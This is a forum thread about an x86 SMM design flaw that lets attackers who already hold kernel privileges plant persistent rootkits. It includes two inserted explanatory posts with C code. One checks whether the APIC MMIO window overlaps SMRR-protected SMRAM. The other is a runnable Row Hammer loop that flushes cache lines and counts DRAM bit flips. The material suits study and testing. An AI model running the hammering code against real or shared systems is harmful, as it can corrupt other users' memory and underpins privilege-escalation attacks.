Flaw In Intel Chips Opens Door To Rootkits

Security researchers have found a design flaw in the x86 processors that could allow attackers to install a rootkit. It's amazing no one has discovered this until now.

To exploit the vulnerability and install the rootkit, attackers would need to already have kernel or system privileges on a computer. That means the flaw can't be used by itself to compromise a system, but could make an existing malware infection highly persistent and completely invisible.
 
AMD chips? Anyone? No one?

ComputerWorld Article said:
Domas only tested the exploit successfully on Intel processors, but noted that x86 processors made by AMD should in theory be vulnerable as well.

Since AMD uses an x86 license for Intel's x86 instruction set architecture, featuring various extensions, likely not.
 
Seeing that they need to have kernel-level access, they can pretty much do anything they like at that point. The main issue is that it allows software to override Intel's worthless BIOS-based security code, which very few things use because we all know it's crap anyway. It mostly just boils down to making exploits harder to get rid of (thanks Intel).

The plus is that it totally invalidates the concept of secure boot.
 
The plus is that it totally invalidates the concept of secure boot.

During 2014's DEFCON, there were a lot of already broken and insecure things done to secure boot, so that would be more like just poking another hole in an already leaky ship.
 
So Intel knew about the problem way back in 2006 as they had patents for the fix.

Yet Intel won't release data on what chips are vulnerable so that government, corporate, and personal entities can update their platform to mitigate the risk.
 
Is this not an open invitation to hackers?......Is there any evidence that this vulnerability has been exploited?
 
So if you have root you can change shit. How interesting.
 
Is this not an open invitation to hackers?......Is there any evidence that this vulnerability has been exploited?

I'd swear that there'd been leaks (Snowden?) that the government was able to infect computers even if the machine was wiped and the OS reinstalled... so my guess is yes it is.
 
I'd swear that there'd been leaks (Snowden?) that the government was able to infect computers even if the machine was wiped and the OS reinstalled... so my guess is yes it is.

That was mostly via compromised hard drive firmware.
 
That was mostly via compromised hard drive firmware.

Fair enough. I'd still be surprised if the NSA didn't already exploit the vulnerability. We know they find bugs and don't say anything, because security requires insecurity :rolleyes:
 
IIRC from the earlier SMM rootkit flaw, the knowledge required to attack a particular system is pretty specific to the vendor so it's not a general exploit. It's just another tool that can be used in targeted attacks, and most likely has been used many times.

AMD chips? Anyone? No one?
AMD uses SMM, so it's also vulnerable.
 
Keyword "could". I would fly if I were Superman.

Wikipedia article on SMM said:
By design, the operating system cannot override or disable the SMI. Due to this fact, it is a target for malicious rootkits to reside in,[10][11][12] including NSA's "implants"[13] which have individual code names for specific hardware, like SOUFFLETROUGH for Juniper Networks firewalls,[14] SCHOOLMONTANA for J-series routers of the same company,[15] DEITYBOUNCE for DELL,[16] or IRONCHEF for HP Proliant servers.[17]

Nice to meet you, Clark! :p
 
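The Wikipedia paragraph quoted above says the OS cannot disable SMI, which is why SMRAM is a rootkit target. The design flaw the thread is about (Domas' Black Hat 2015 work) abuses a different cross-check: the local APIC's 4 KiB MMIO window can be moved with the IA32_APIC_BASE MSR, and if it is parked on top of SMRAM, SMM code that touches that page reads the APIC instead of its own memory. The following C is an added example (not from the article, the thread, or Domas' release) that decodes the MSR values involved and flags an APIC window sitting inside the SMRR-protected range. The field layouts are from the Intel SDM; the MSR values in main() are constructed sample values, not captured from a real machine. On a live system the three values would be read in ring 0 (for example `rdmsr 0x1b`, `rdmsr 0x1f2`, `rdmsr 0x1f3` from msr-tools), which is exactly the privilege level the article says an attacker must already hold.

```c
#include <stdint.h>
#include <stdio.h>

/* Bit layout of IA32_APIC_BASE (MSR 0x1B), Intel SDM vol. 3A. */
#define APIC_BASE_BSP        (1ULL << 8)
#define APIC_BASE_X2APIC     (1ULL << 10)   /* x2APIC mode: the MMIO window is not decoded */
#define APIC_BASE_ENABLE     (1ULL << 11)   /* APIC global enable */
#define APIC_BASE_ADDR_MASK  0x000FFFFFFFFFF000ULL /* base address bits, 4 KiB aligned */

/* IA32_SMRR_PHYSBASE (MSR 0x1F2) / IA32_SMRR_PHYSMASK (MSR 0x1F3):
   4 KiB granularity, covers only physical addresses below 4 GiB. */
#define SMRR_ADDR_MASK       0xFFFFF000ULL
#define SMRR_VALID           (1ULL << 11)
#define FOUR_GIB             0x100000000ULL

/* Physical address of the 4 KiB xAPIC MMIO window, or 0 if no window is decoded
   (APIC disabled, or x2APIC mode where register access goes through MSRs). */
uint64_t apic_mmio_window(uint64_t apic_base_msr)
{
    if (!(apic_base_msr & APIC_BASE_ENABLE) || (apic_base_msr & APIC_BASE_X2APIC))
        return 0;
    return apic_base_msr & APIC_BASE_ADDR_MASK;
}

/* Size in bytes of the SMRR-protected region described by PHYSMASK. */
uint64_t smrr_region_size(uint64_t smrr_physmask)
{
    uint64_t mask = smrr_physmask & SMRR_ADDR_MASK;
    return (~mask & SMRR_ADDR_MASK) + 0x1000;
}

/* -1: SMRR not valid, so SMRAM has no range protection at all.
    1: the APIC MMIO window lies inside the SMRR range (the overlay condition).
    0: no window, or the window is outside the protected range. */
int apic_overlaps_smrr(uint64_t apic_base_msr, uint64_t smrr_physbase, uint64_t smrr_physmask)
{
    if (!(smrr_physmask & SMRR_VALID))
        return -1;
    uint64_t window = apic_mmio_window(apic_base_msr);
    if (window == 0 || window >= FOUR_GIB)   /* SMRR cannot describe anything above 4 GiB */
        return 0;
    uint64_t mask = smrr_physmask & SMRR_ADDR_MASK;
    /* An address A is inside the range when (A & PhysMask) == (PhysBase & PhysMask). */
    return ((window & mask) == (smrr_physbase & mask)) ? 1 : 0;
}

int main(void)
{
    /* Constructed sample values (assumptions, not read from hardware):
       an 8 MiB TSEG at 0x7B000000, memory type WB (6), SMRR valid. */
    const uint64_t smrr_base    = 0x7B000006ULL;
    const uint64_t smrr_mask    = 0xFF800800ULL;
    const uint64_t apic_default = 0xFEE00900ULL;  /* BSP + enabled, default window at 0xFEE00000 */
    const uint64_t apic_moved   = 0x7B7FF900ULL;  /* same flags, window relocated onto a TSEG page */

    printf("SMRR: %llu MiB at 0x%llx\n",
           (unsigned long long)(smrr_region_size(smrr_mask) >> 20),
           (unsigned long long)(smrr_base & SMRR_ADDR_MASK));
    printf("default APIC base   -> overlap=%d\n", apic_overlaps_smrr(apic_default, smrr_base, smrr_mask));
    printf("relocated APIC base -> overlap=%d\n", apic_overlaps_smrr(apic_moved, smrr_base, smrr_mask));
    return 0;
}
```

Two things the check cannot do: it only reports the state of one core at one instant (the relocation is done by the attacker from ring 0 and can be undone after the SMI), and a result of 0 says nothing about other SMM bugs. It is useful as a sanity check on whether SMRR is even programmed, which is the precondition for the overlay to matter.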
But can Angelina Jolie still hack the Gibson to access the kernel and install the rootkit?
 
So what that paper said was that you can use this design flaw to modify an i5 into an i7.
 
I thought this was going to be about row hammer but this is apparently something else.

Row Hammer is a problem with DRAM rather than the CPU though.

That said, I'm surprised the Row Hammer exploit hasn't gotten more attention. I made a post about it in the memory sub-forum once and never got any replies. It seems like a very serious exploit that has actually been demonstrated in practical attacks and yet it has pretty much been ignored.
 
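On the Row Hammer side-thread: the post above is right that it is a DRAM problem, and the reason it needs no special privilege is that the whole attack is just a read loop. The following C is an added example, not code from anyone in the thread or from the original Row Hammer paper; it is the single-sided variant (random address pairs, cache line flushed between reads so each access reaches DRAM) with a bit-flip count over the buffer afterwards. The buffer size, pair count and read count in main() are assumptions chosen to run quickly; seeing a flip on real hardware needs a buffer of hundreds of MiB, hundreds of thousands of reads per pair inside one refresh interval, and many pairs, and a short run is expected to return 0 flips. The clflush is x86-only inline assembly; on other architectures the loop compiles but only hits cache.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Evict one cache line so the next read of *p goes to DRAM (x86 only). */
static inline void flush_line(volatile const void *p)
{
#if defined(__x86_64__) || defined(__i386__)
    __asm__ volatile("clflush (%0)" : : "r"(p) : "memory");
#else
    (void)p;   /* no flush available: loop below will only hit cache */
#endif
}

/* Hammer one address pair: alternate reads of a and b, flushing after each,
   which is the aggressor access pattern. Returns the read sum only so the
   compiler cannot drop the loads. */
unsigned hammer_pair(volatile uint8_t *a, volatile uint8_t *b, long reads)
{
    unsigned acc = 0;
    for (long i = 0; i < reads; i++) {
        acc += *a;
        acc += *b;
        flush_line(a);
        flush_line(b);
    }
    return acc;
}

/* Count bits in buf that differ from the fill byte written before hammering. */
size_t count_bit_flips(const uint8_t *buf, size_t len, uint8_t expected)
{
    size_t flips = 0;
    for (size_t i = 0; i < len; i++)
        flips += (size_t)__builtin_popcount((unsigned)(buf[i] ^ expected));
    return flips;
}

/* Deterministic check of the counter on a constructed buffer: two damaged bytes. */
size_t demo_flip_count(void)
{
    static const uint8_t victim[6] = { 0xFF, 0xFE, 0xFF, 0xFF, 0x7F, 0xFF };
    return count_bit_flips(victim, sizeof victim, 0xFF);   /* 2 */
}

/* One trial: fill a buffer with 0xFF, hammer `pairs` random pairs, return flips.
   Returns (size_t)-1 if the allocation fails. */
size_t rowhammer_trial(size_t buf_len, int pairs, long reads_per_pair, unsigned seed)
{
    uint8_t *buf = malloc(buf_len);
    if (!buf)
        return (size_t)-1;
    memset(buf, 0xFF, buf_len);
    srand(seed);
    for (int p = 0; p < pairs; p++) {
        size_t ia = (size_t)rand() % buf_len;
        size_t ib = (size_t)rand() % buf_len;
        hammer_pair(buf + ia, buf + ib, reads_per_pair);
    }
    size_t flips = count_bit_flips(buf, buf_len, 0xFF);
    free(buf);
    return flips;
}

int main(void)
{
    /* Assumed parameters for a quick run; raise all three for a real test. */
    size_t flips = rowhammer_trial((size_t)64 << 20, 64, 200000, 1u);
    if (flips == (size_t)-1)
        fprintf(stderr, "allocation failed\n");
    else
        printf("bit flips observed: %zu\n", flips);
    return 0;
}
```

Random pairs are what the original Google test did; it works because with a large enough buffer some pairs land in different rows of the same bank. Double-sided hammering (aggressors on both neighbours of a victim row) is far more effective but needs physical addresses, which is the part that requires privilege.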